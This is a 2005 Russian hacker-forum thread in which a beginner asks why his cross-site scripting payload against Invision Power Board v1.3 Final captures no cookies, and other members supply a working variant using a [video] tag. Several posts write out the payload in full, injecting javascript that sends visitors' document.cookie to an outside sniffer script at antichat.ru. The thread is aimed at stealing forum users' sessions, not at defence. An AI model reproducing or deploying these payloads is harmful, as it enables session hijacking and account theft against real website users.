ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Вопрос по использованию XSS на Powered by Invision Power Board(U) v1.3 Final
  #1  
Старый 31.01.2005, 18:36
Аватар для rsha1988
rsha1988
Участник форума
Регистрация: 03.01.2005
Сообщений: 270
Провел на форуме:
58594

Репутация: 6
Question Вопрос по использованию XSS на Powered by Invision Power Board(U) v1.3 Final

В форуме Powered by Invision Power Board(U) v1.3 Final © 2003 IPS, Inc.
вставляю :
'>` style=background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)
И чето не каких кук в снифере не вижу!
Что я сделал неправильно?
 
Ответить с цитированием

  #2  
Старый 31.01.2005, 19:42
Аватар для Del
Del
Новичок
Регистрация: 24.01.2005
Сообщений: 6
Провел на форуме:
10023

Репутация: 0
По умолчанию

В файнале фильтруются многие символы...
Посмотри Html
Кстати фильтр мешает ещё и спаренные тэги использовать
 
Ответить с цитированием

  #3  
Старый 31.01.2005, 19:51
Аватар для rsha1988
rsha1988
Участник форума
Регистрация: 03.01.2005
Сообщений: 270
Провел на форуме:
58594

Репутация: 6
По умолчанию

А можно чуть чуть по подробнее?
Я вставляю в сообщение эту фигню:
'>` style=background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)
и она не меняеться не фига когда попадает в тему, так же и остаеться!
 
Ответить с цитированием

  #4  
Старый 31.01.2005, 23:34
Аватар для Del
Del
Новичок
Регистрация: 24.01.2005
Сообщений: 6
Провел на форуме:
10023

Репутация: 0
По умолчанию

А к какому тэгу у тебя style в итоге относится?
 
Ответить с цитированием

  #5  
Старый 31.01.2005, 23:45
Аватар для rsha1988
rsha1988
Участник форума
Регистрация: 03.01.2005
Сообщений: 270
Провел на форуме:
58594

Репутация: 6
Post

Фиг знает....
Я же всетаки начанающий...
 
Ответить с цитированием

  #6  
Старый 05.02.2005, 18:56
Аватар для foreva
foreva
Участник форума
Регистрация: 05.02.2005
Сообщений: 121
Провел на форуме:
0

Репутация: 10
Отправить сообщение для foreva с помощью ICQ
По умолчанию

Вообще-то баг работает через определенные теги!
например:
Код:
[video]http://1.ru e=`[/video]` style=display:none;background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) Lol
Читай внимательнее инфу на сайте!!
http://antichat.ru/txt/IPB/
 
Ответить с цитированием

  #7  
Старый 05.02.2005, 21:33
Аватар для byte57
byte57
Постоянный
Регистрация: 22.01.2005
Сообщений: 764
Провел на форуме:
1086047

Репутация: 67


По умолчанию

rsha1988, напиши как парсится в предпросмотре....
 
Ответить с цитированием

  #8  
Старый 07.02.2005, 03:01
Аватар для rsha1988
rsha1988
Участник форума
Регистрация: 03.01.2005
Сообщений: 270
Провел на форуме:
58594

Репутация: 6
По умолчанию

Цитата:
Сообщение от .::Gh0st::.  
rsha1988, напиши как парсится в предпросмотре....
переведи...
 
Ответить с цитированием

  #9  
Старый 07.02.2005, 06:39
Аватар для BlackPrince
BlackPrince
Познающий
Регистрация: 13.10.2004
Сообщений: 82
Провел на форуме:
102923

Репутация: 13
Отправить сообщение для BlackPrince с помощью ICQ
По умолчанию

Цитата:
Сообщение от rsha1988  
переведи...
Скажи, что получается в HTML
 
Ответить с цитированием

  #10  
Старый 08.02.2005, 20:14
Аватар для rsha1988
rsha1988
Участник форума
Регистрация: 03.01.2005
Сообщений: 270
Провел на форуме:
58594

Репутация: 6
По умолчанию

[video]http://1.ru e=`[/video]` style=display:none;background:none;background:url( javascript:docum ent.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) Lol - эт и получаеться!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Уязвимости в Invision Power Board(U) v1.3 PF1. Вопрос. dukalis(AwP) Форумы 14 19.04.2006 19:40
Вопросы по форуму Invision Power Board(U) v1.3 Final © 2003(р) FRTD Форумы 50 02.04.2005 02:48
SQL запрос в Powered by Invision Power Board(U) v1.3 Майор Форумы 4 17.01.2005 01:56
Вопрос про уязвимости в Invision Power Board(U) v1.3 Final Майор Форумы 15 14.01.2005 14:20



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ